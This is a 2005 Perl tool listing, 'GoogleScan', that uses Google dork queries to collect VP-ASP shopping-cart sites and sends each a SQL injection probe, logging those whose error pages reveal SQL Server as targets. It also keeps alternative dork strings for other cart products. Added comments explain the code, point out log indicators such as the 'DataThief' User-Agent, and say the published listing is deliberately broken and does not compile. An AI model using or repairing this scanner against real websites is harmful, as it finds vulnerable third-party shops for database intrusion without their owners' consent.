$Id: bosen-tool.6,v1 17/05/2005 bosen Exp $
1ndonesian Security Team (1st) Bosen Tools #6
GoogleScan 17/05/2005 [1st]
Scan using google for exploitable sql injection
_______________________________________________________________________________
#!/usr/bin/perl
#
# GoogleScan 1.1 — historical (2005) scanner listing, reproduced as published.
#
# What the code below actually does, as far as the listing shows:
#   1. Builds a Google web-search URL (10 results per page, `allinurl:` query)
#      for the string in $look4 and walks the result pages, 10 at a time, up to
#      a hard limit of 1000 results (the `while ($cnt < 1000)` loop).
#   2. getData() fetches one result page and pulls out every `href=http://...`
#      that contains "shopexd.asp", keeping the part of the URL before that
#      file name.
#   3. goScan() requests each collected base URL with a fixed probe string
#      appended, renders the response to plain text and classifies it purely by
#      substring matching on the error text the server sends back
#      ("JET Database", "Access Driver", "ADODB", "SQL Server").
#   4. Hits are appended to target.out; everything else to reseh.out
#      ("debug" log).
#
# Notes for defenders / readers:
#   - The classification depends entirely on verbose database error pages
#     being returned to the client; applications that return a generic error
#     page instead give this script nothing to match on.
#   - Two indicators appear verbatim in this listing and would show up in web
#     server logs: the User-Agent set via $bosen->agent() (note the trailing
#     space in "DataThief/$VERSION ") and the probe string appended in
#     goScan().
#   - The script runs without `use strict` / `use warnings`; every variable
#     except the two `my` declarations in getData() is a package global.
#     Variable names ($urlnya, $gembel, $biji, $gendut, ...) are Indonesian
#     slang, not meaningful identifiers.
#   - The author's own comments ("i let you with these bug", "another bug for
#     you") mark lines that were left deliberately broken. They are preserved
#     unchanged here; this listing is not a working tool as published.
#
$VERSION = "1.1";
# Joke line: BRAIN is not a module the listing provides, and `no` is a
# statement, not an expression, so `if no BRAIN` is a syntax error.
# As published, this file does not compile.
use BRAIN; die() if no BRAIN;
print " 1ndonesian Security Team (1st) - http://bosen.net/releases/ =========================================================== GoogleScan $VERSION A DataThief Add-On by Bosen. ";
use LWP;
use HTTP::Request;
use HTTP::Response;
$|=1; # autoflush STDOUT — original comment: "so that AresU gets confused :P"
# $pp is both Google's `num=` page size and the `start=` increment below.
$pp = 10;
$google = "http://www.google.com/search?num=".$pp;
$google .= "&hl=en&filter=0&lr=&ie=UTF-8&oe=utf-8&as_qdr=all&btnG=Search&q=allinurl:";
$counter= "&sa=N&start=";
# wat we look for :P
# Only the uncommented $look4 is used; the commented lines are alternative
# search strings the author kept around for other shopping-cart products.
### VPASP ###
$look4 = "shopexd.asp?id=";
#$look4 = "shopaddtocart%20asp";
#$look4 = "shopaddtocart.asp?ProductID=";
#$look4 = "shopaddtocart.asp";
### METACART
#$look4 = "productsByCategory.asp?strSubCatalogID=";
$bosen = LWP::UserAgent->new();
# Fixed User-Agent, trailing space included — a log-side indicator for this
# tool.
$bosen->agent("DataThief/$VERSION ");
# $lastpage is set by getData() when Google's "we have omitted some" footer
# is seen; that is the only stop condition other than the 1000-result cap.
$lastpage = 0;
$cnt = 0;
while ($cnt < 1000) {
    $urlnya = $google.$look4.$counter.$cnt;
    print "\nprocessing $urlnya\n";
    # Note: getData() is defined below this call site, so its ($$) prototype
    # is not in effect here and the single-argument call compiles.
    @ures = getData($urlnya);
    goScan();
    if ($lastpage) { print "\ndat's a rap!\n"; exit(); };
    $cnt += $pp;
};
# getData($url): fetch one Google result page and return the list of base URLs
# (everything before "shopexd.asp") found in its hrefs. Side effect: sets the
# global $lastpage when the results-omitted footer is present. Non-HTML
# responses and transport errors yield an empty list — $data->content_type is
# the only check made.
sub getData($$) {
    my($url) = @_;
    my @urls;
    $gembel = HTTP::Request->new(GET => $url);
    $data = $bosen->request($gembel);
    if ($data->content_type eq 'text/html') {
        $biji = $data->content;
        if ($biji =~ m/we have omitted some/) { $lastpage = 1; }
        # i let you with these bug :P
        # (author's own marker — the extraction below is left as published)
        while ($biji =~ m#href=(http://\S+shopexd.asp\S+)#g) {
            # skip Google redirect-style hrefs that embed a second URL
            next if $1 =~ m#http://.*http://#i;
            $1 =~ m/(.*)shopexd.asp/;
            push(@urls,$1);
        }
    }
    return @urls;
}
# goScan(): for every URL in the global @ures, append the probe string,
# request the page, flatten it to text and classify by error-message
# substrings. Appends matches to target.out and everything else to reseh.out.
# Note the `for $url (@ures)` aliases each element, so the `.=` mutates @ures
# in place; the loop variable is also a package global (no `my`).
sub goScan() {
    for $url (@ures) {
        # hehe another bug for you :P
        # (author's own marker — left as published)
        $url .= "shopexd.asp?id=' having 1=1--";
        print "\nchecking $url ... 
";
        $gembel = HTTP::Request->new(GET => $url);
        $data = $bosen->request($gembel);
        # HTML::Parse / HTML::FormatText are loaded lazily, on every
        # iteration; `require` is a no-op after the first load.
        require HTML::Parse;
        require HTML::FormatText;
        $rio = HTML::Parse::parse_html($data->content);
        $gendut = HTML::FormatText->new(leftmargin=>0,rightmargin=>500);
        $biji = $gendut->format($rio);
        # Classification is substring matching on whatever error text the
        # server returned; a generic error page matches nothing and falls
        # through to "not vuln". The order matters: the three "not vuln"
        # checks run before the "SQL Server" check.
        if ($biji =~ m/JET Database/) { print "not vuln"; next; }
        if ($biji =~ m/Access Driver/) { print "not vuln"; next; }
        if ($biji =~ m/ADODB/) { print "not vuln"; next; }
        # Bareword handle, 2-arg open, no error check — as published.
        if ($biji =~ m/SQL Server/) { print "vuln"; open(LOG,">>target.out"); print LOG "$url\n"; print LOG "$biji\n\n"; close(LOG); next; }
        print "not vuln";
        # Keep the rest for debug
        open(LOG,">>reseh.out"); print LOG "$url\n"; print LOG "$biji\n\n"; close(LOG);
    }
}
Bosen
======================
Original document can be fount at http://bosen.net/releases/?id=52